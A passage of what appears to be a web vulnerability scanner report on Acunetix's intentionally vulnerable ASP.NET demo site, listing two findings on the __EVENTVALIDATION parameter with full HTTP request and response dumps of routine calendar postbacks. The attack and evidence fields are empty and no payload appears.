Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8140&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAaeJyHtoIZGRkUxZCQj7%2FVoRQUjsdiGcGpjSlFVQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjmvjCBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOL4Kn6C8z8DaAqLeh3zzAQdd2Id
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:12 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAaeJyHtoIZGRkUxZCQj7/VoRQUjsdiGcGpjSlFVQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjmvjCBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOL4Kn6C8z8DaAqLeh3zzAQdd2Id" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:White" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8219&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAC%2FmGXNoIZGRkggdPgDAH9MYw8pNKnbpsuifJOuk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjp7uNDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BsQ4tBBzGek4Tu0zkMZKcJZulQdA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:54 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAC/mGXNoIZGRkggdPgDAH9MYw8pNKnbpsuifJOuk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjp7uNDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+sQ4tBBzGek4Tu0zkMZKcJZulQdA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:White" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to 